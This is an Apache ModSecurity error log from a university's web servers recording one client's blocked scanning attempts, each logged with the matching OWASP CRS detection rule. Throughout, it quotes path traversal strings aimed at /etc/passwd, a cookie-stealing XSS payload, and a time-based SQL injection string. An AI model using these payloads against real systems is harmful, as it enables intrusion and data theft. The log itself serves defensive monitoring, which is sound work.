[Tue Aug 29 11:41:01.548517 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sidebar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:sidebar: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/default/en_US/frame.A100.html"] [unique_id "ZO123cCo-f0AAAYMWTwAAAAR"]
[Tue Aug 29 11:41:01.551898 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:UPusername. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:UPusername: \\x22><script>javascript:alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/MUP/"] [unique_id "ZO123cCo-f0AAAcYU7wAAAAp"]
[Tue Aug 29 11:41:01.569190 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO123cCo-f0AAAaZ9l4AAAAo"]
[Tue Aug 29 11:41:01.595082 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sidebar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:sidebar: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/default/en_US/frame.A100.html"] [unique_id "ZO123cCo-f0AAAYf-MIAAAAD"]
[Tue Aug 29 11:41:01.606575 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:UPusername. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:UPusername: \\x22><script>javascript:alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/MUP/"] [unique_id "ZO123cCo-f0AAAcsLDMAAAAE"]
[Tue Aug 29 11:41:01.617550 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:UPusername. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:UPusername: \\x22><script>javascript:alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/MUP/"] [unique_id "ZO123cCo-f0AAAcYU78AAAAp"]
[Tue Aug 29 11:41:01.618820 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO123cCo-f0AAActbGAAAAAH"]
[Tue Aug 29 11:41:01.618857 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:UPusername. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:UPusername: \\x22><script>javascript:alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/MUP/"] [unique_id "ZO123cCo-f0AAAYf-MMAAAAD"]
[Tue Aug 29 11:41:01.619708 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/photoalbum/index.php"] [unique_id "ZO123cCo-f0AAAcvBdQAAAAJ"]
[Tue Aug 29 11:41:01.622430 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO123cCo-f0AAAYMWT8AAAAR"]
[Tue Aug 29 11:41:01.624530 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO123cCo-f0AAAcbSCQAAAAv"]
[Tue Aug 29 11:41:01.639351 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file_name: ../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/webui/"] [unique_id "ZO123cCo-f0AAAcYU8AAAAAp"]
[Tue Aug 29 11:41:01.640140 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO123cCo-f0AAActbGEAAAAH"]
[Tue Aug 29 11:41:01.640565 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/lists/csvexport.php"] [unique_id "ZO123cCo-f0AAAYf-MQAAAAD"]
[Tue Aug 29 11:41:01.661125 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:UPusername. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:UPusername: \\x22><script>javascript:alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/MUP/"] [unique_id "ZO123cCo-f0AAAaZ9mIAAAAo"]
[Tue Aug 29 11:41:02.380033 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:content: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/default/en_US/frame.html"] [unique_id "ZO123sCo-f0AAAcoNOUAAAAF"]
[Tue Aug 29 11:41:02.395267 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:UPusername. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:UPusername: \\x22><script>javascript:alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/MUP/"] [unique_id "ZO123sCo-f0AAAcsLDcAAAAE"]
[Tue Aug 29 11:41:02.396857 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO123sCo-f0AAAaZ9mQAAAAo"]
[Tue Aug 29 11:41:03.563857 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/searchblox/servlet/FileServlet"] [unique_id "ZO1238Co-f0AAAcuUmMAAAAI"]
[Tue Aug 29 11:41:03.585140 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:firstname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:firstname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO1238Co-f0AAAcuUmQAAAAI"]
[Tue Aug 29 11:41:03.586760 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:firstname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:firstname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO1238Co-f0AAAcsLD4AAAAE"]
[Tue Aug 29 11:41:03.588495 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sidebar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:sidebar: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/default/en_US/frame.A100.html"] [unique_id "ZO1238Co-f0AAAYMWUUAAAAR"]
[Tue Aug 29 11:41:03.600825 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:firstname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:firstname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO1238Co-f0AAAcvBd8AAAAJ"]
[Tue Aug 29 11:41:03.619705 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/searchblox/servlet/FileServlet"] [unique_id "ZO1238Co-f0AAAYMWUYAAAAR"]
[Tue Aug 29 11:41:03.620774 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/searchblox/servlet/FileServlet"] [unique_id "ZO1238Co-f0AAAcvBeAAAAAJ"]
[Tue Aug 29 11:41:03.622403 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/searchblox/servlet/FileServlet"] [unique_id "ZO1238Co-f0AAAcsLD8AAAAE"]
[Tue Aug 29 11:41:03.623628 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:firstname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:firstname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO1238Co-f0AAAcuUmYAAAAI"]
[Tue Aug 29 11:41:03.644557 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/searchblox/servlet/FileServlet"] [unique_id "ZO1238Co-f0AAAaZ9msAAAAo"]
[Tue Aug 29 11:41:03.646496 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:firstname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:firstname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO1238Co-f0AAAcuUmcAAAAI"]
[Tue Aug 29 11:41:04.388037 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/CFIDE/debug/cf_debugFr.cfm"] [unique_id "ZO124MCo-f0AAAcsLEIAAAAE"]
